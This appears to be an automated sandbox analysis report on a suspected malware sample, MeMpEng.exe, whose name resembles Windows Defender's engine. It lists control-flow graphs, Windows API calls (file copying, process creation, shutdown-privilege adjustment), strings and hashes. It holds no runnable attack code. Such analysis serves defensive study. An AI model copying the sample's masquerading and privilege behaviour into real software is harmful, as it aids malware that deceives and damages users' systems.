ExitProcess 84->86 87 403b3e 84->87 90 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 85->90 91 403b04-403b12 call 406948 85->91 87->86 94 4038f0-4038f4 89->94 95 4038e9-4038ee 89->95 90->91 104 403b20-403b2b ExitWindowsEx 91->104 105 403b14-403b1e 91->105 92->63 106 403918-40392e call 406554 * 2 92->106 110 40397e-403996 93->110 111 40396f-403979 call 406554 93->111 94->89 99 4038f6 94->99 95->94 95->99 99->82 104->84 108 403b2d-403b2f call 40140b 104->108 105->104 105->108 106->68 108->84 117 40399b-40399f 110->117 111->110 119 4039a4-4039ce wsprintfW call 406591 117->119 122 4039d0-4039d5 call 405aa8 119->122 123 4039d7 call 405b02 119->123 127 4039dc-4039de 122->127 123->127 128 4039e0-4039ea GetFileAttributesW 127->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 127->129 130 403a0b-403a16 128->130 131 4039ec-4039f5 DeleteFileW 128->131 136 403a78 129->136 137 403a3b-403a5c call 406314 call 406591 call 405b37 129->137 130->117 135 403a18 130->135 131->130 134 4039f7-403a09 call 405c60 131->134 134->119 134->130 135->63 136->63 146 403aa2-403aae CloseHandle 137->146 147 403a5e-403a68 137->147 146->136 147->136 148 403a6a-403a72 call 4068b1 147->148 148->119 148->136
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403552
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403666
                                                          • OleInitialize.OLE32(00000000), ref: 0040366D
                                                          • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                                          • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A1
                                                          • CharNextW.USER32(00000000), ref: 004036DA
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
                                                          • lstrcatW.KERNEL32 ref: 0040382F
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403843
                                                          • lstrcatW.KERNEL32 ref: 0040384B
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385C
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403864
                                                          • DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403878
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403951
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                          • wsprintfW.USER32 ref: 004039AE
                                                          • GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
                                                          • DeleteFileW.KERNEL32(007AB800), ref: 004039ED
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B
                                                            • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005), ref: 0040631E
                                                          • CopyFileW.KERNEL32 ref: 00403A31
                                                            • Part of subcall function 00405B37: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                                            • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(7570D4C4,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                            • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                                          • OleUninitialize.OLE32 ref: 00403A7F
                                                          • ExitProcess.KERNEL32 ref: 00403A9C
                                                          • CloseHandle.KERNEL32(00000000), ref: 00403AA3
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403ABF
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                                          • ExitProcess.KERNEL32 ref: 00403B46
                                                            • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\MeMpEng.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-2530467214
                                                          • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                          • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                                          • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                          • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 508 405c60-405c86 call 405f2b 511 405c88-405c9a DeleteFileW 508->511 512 405c9f-405ca6 508->512 513 405e1c-405e20 511->513 514 405ca8-405caa 512->514 515 405cb9-405cc9 call 406554 512->515 517 405cb0-405cb3 514->517 518 405dca-405dcf 514->518 521 405cd8-405cd9 call 405e6f 515->521 522 405ccb-405cd6 lstrcatW 515->522 517->515 517->518 518->513 520 405dd1-405dd4 518->520 523 405dd6-405ddc 520->523 524 405dde-405de6 call 4068b1 520->524 525 405cde-405ce2 521->525 522->525 523->513 524->513 532 405de8-405dfc call 405e23 call 405c18 524->532 528 405ce4-405cec 525->528 529 405cee-405cf4 lstrcatW 525->529 528->529 531 405cf9-405d15 lstrlenW FindFirstFileW 528->531 529->531 533 405d1b-405d23 531->533 534 405dbf-405dc3 531->534 548 405e14-405e17 call 4055d9 532->548 549 405dfe-405e01 532->549 537 405d43-405d57 call 406554 533->537 538 405d25-405d2d 533->538 534->518 536 405dc5 534->536 536->518 550 405d59-405d61 537->550 551 405d6e-405d79 call 405c18 537->551 540 405da2-405db2 FindNextFileW 538->540 541 405d2f-405d37 538->541 540->533 545 405db8-405db9 FindClose 540->545 541->537 546 405d39-405d41 541->546 545->534 546->537 546->540 548->513 549->523 552 405e03-405e12 call 4055d9 call 406314 549->552 550->540 553 405d63-405d6c call 405c60 550->553 561 405d9a-405d9d call 4055d9 551->561 562 405d7b-405d7e 551->562 552->513 553->540 561->540 565 405d80-405d90 call 4055d9 call 406314 562->565 566 405d92-405d98 562->566 565->540 566->540
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405C89
                                                          • lstrcatW.KERNEL32 ref: 00405CD1
                                                          • lstrcatW.KERNEL32 ref: 00405CF4
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405CFA
                                                          • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405D0A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
                                                          • FindClose.KERNEL32(00000000), ref: 00405DB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                                          • API String ID: 2035342205-3945114116
                                                          • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                          • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                                          • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                          • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(7570D4C4,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                          • FindClose.KERNEL32(00000000), ref: 004068C8
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                          • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                                          • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                          • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                          • Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
                                                          • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                          • Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 405718-405733 152 4058c2-4058c9 151->152 153 405739-405800 GetDlgItem * 3 call 404508 call 404e61 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 4058f3-405900 152->155 156 4058cb-4058ed GetDlgItem CreateThread CloseHandle 152->156 175 405802-40581c SendMessageW * 2 153->175 176 40581e-405821 153->176 158 405902-405908 155->158 159 40591e-405928 155->159 156->155 161 405943-40594c call 40453a 158->161 162 40590a-405919 ShowWindow * 2 call 404508 158->162 163 40592a-405930 159->163 164 40597e-405982 159->164 172 405951-405955 161->172 162->159 165 405932-40593e call 4044ac 163->165 166 405958-405968 ShowWindow 163->166 164->161 169 405984-40598a 164->169 165->161 173 405978-405979 call 4044ac 166->173 174 40596a-405973 call 4055d9 166->174 169->161 177 40598c-40599f SendMessageW 169->177 173->164 174->173 175->176 180 405831-405848 call 4044d3 176->180 181 405823-40582f SendMessageW 176->181 182 405aa1-405aa3 177->182 183 4059a5-4059d0 CreatePopupMenu call 406591 AppendMenuW 177->183 190 40584a-40585e ShowWindow 180->190 191 40587e-40589f GetDlgItem SendMessageW 180->191 181->180 182->172 188 4059d2-4059e2 GetWindowRect 183->188 189 4059e5-4059fa TrackPopupMenu 183->189 188->189 189->182 192 405a00-405a17 189->192 193 405860-40586b ShowWindow 190->193 194 40586d 190->194 191->182 195 4058a5-4058bd SendMessageW * 2 191->195 196 405a1c-405a37 SendMessageW 192->196 197 405873-405879 call 404508 193->197 194->197 195->182 196->196 198 405a39-405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a5e-405a85 SendMessageW 198->200 200->200 201 405a87-405a9b GlobalUnlock SetClipboardData CloseClipboard 200->201 201->182
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405776
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405785
                                                          • GetClientRect.USER32 ref: 004057C2
                                                          • GetSystemMetrics.USER32 ref: 004057C9
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
                                                          • ShowWindow.USER32(00000000,?), ref: 00405851
                                                          • ShowWindow.USER32(?,00000008), ref: 00405865
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405886
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405794
                                                            • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058D8
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
                                                          • CloseHandle.KERNELBASE(00000000), ref: 004058ED
                                                          • ShowWindow.USER32(00000000), ref: 00405911
                                                          • ShowWindow.USER32(?,00000008), ref: 00405916
                                                          • ShowWindow.USER32(00000008), ref: 00405960
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
                                                          • CreatePopupMenu.USER32 ref: 004059A5
                                                          • AppendMenuW.USER32 ref: 004059B9
                                                          • GetWindowRect.USER32(?,?), ref: 004059D9
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F2
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
                                                          • OpenClipboard.USER32(00000000), ref: 00405A3A
                                                          • EmptyClipboard.USER32 ref: 00405A40
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
                                                          • GlobalLock.KERNEL32 ref: 00405A56
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
                                                          • SetClipboardData.USER32 ref: 00405A95
                                                          • CloseClipboard.USER32 ref: 00405A9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                                          • Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
                                                          • Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                                          • Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 202 403fd4-403fe6 203 403fec-403ff2 202->203 204 40414d-40415c 202->204 203->204 205 403ff8-404001 203->205 206 4041ab-4041c0 204->206 207 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 204->207 208 404003-404010 SetWindowPos 205->208 209 404016-40401d 205->209 211 404200-404205 call 40451f 206->211 212 4041c2-4041c5 206->212 207->206 208->209 214 404061-404067 209->214 215 40401f-404039 ShowWindow 209->215 221 40420a-404225 211->221 217 4041c7-4041d2 call 401389 212->217 218 4041f8-4041fa 212->218 224 404080-404083 214->224 225 404069-40407b DestroyWindow 214->225 222 40413a-404148 call 40453a 215->222 223 40403f-404052 GetWindowLongW 215->223 217->218 237 4041d4-4041f3 SendMessageW 217->237 218->211 220 4044a0 218->220 232 4044a2-4044a9 220->232 229 404227-404229 call 40140b 221->229 230 40422e-404234 221->230 222->232 223->222 231 404058-40405b ShowWindow 223->231 235 404085-404091 SetWindowLongW 224->235 236 404096-40409c 224->236 233 40447d-404483 225->233 229->230 241 40423a-404245 230->241 242 40445e-404477 DestroyWindow EndDialog 230->242 231->214 233->220 240 404485-40448b 233->240 235->232 236->222 243 4040a2-4040b1 GetDlgItem 236->243 237->232 240->220 246 40448d-404496 ShowWindow 240->246 241->242 247 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 241->247 242->233 244 4040d0-4040d3 243->244 245 4040b3-4040ca SendMessageW IsWindowEnabled 243->245 248 4040d5-4040d6 244->248 249 4040d8-4040db 244->249 245->220 245->244 246->220 274 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 247->274 275 40429a-40429f 247->275 251 404106-40410b call 4044ac 248->251 252 4040e9-4040ee 249->252 253 4040dd-4040e3 249->253 251->222 255 404124-404134 SendMessageW 252->255 257 4040f0-4040f6 252->257 253->255 256 4040e5-4040e7 253->256 255->222 256->251 260 4040f8-4040fe call 40140b 257->260 261 40410d-404116 call 40140b 257->261 272 404104 260->272 261->222 270 404118-404122 261->270 270->272 272->251 278 4042e0-4042e1 274->278 279 4042e3 274->279 275->274 280 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404315-404326 SendMessageW 280->281 282 404328 280->282 283 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 281->283 282->283 283->221 294 404373-404375 283->294 294->221 295 40437b-40437f 294->295 296 404381-404387 295->296 297 40439e-4043b2 DestroyWindow 295->297 296->220 298 40438d-404393 296->298 297->233 299 4043b8-4043e5 CreateDialogParamW 297->299 298->221 300 404399 298->300 299->233 301 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->220 301->220 306 404444-404457 ShowWindow call 40451f 301->306 308 40445c 306->308 308->233
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                                          • ShowWindow.USER32(?), ref: 00404030
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                                          • ShowWindow.USER32(?,00000004), ref: 0040405B
                                                          • DestroyWindow.USER32 ref: 0040406F
                                                          • SetWindowLongW.USER32 ref: 00404088
                                                          • GetDlgItem.USER32(?,?), ref: 004040A7
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                                          • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404177
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404288
                                                          • ShowWindow.USER32(00000000,?), ref: 004042A9
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                                          • EnableWindow.USER32(?,?), ref: 004042D6
                                                          • GetSystemMenu.USER32 ref: 004042EC
                                                          • EnableMenuItem.USER32 ref: 004042F3
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                                          • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                                          • SetWindowTextW.USER32 ref: 0040435C
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404490
                                                          Memory Dump Source
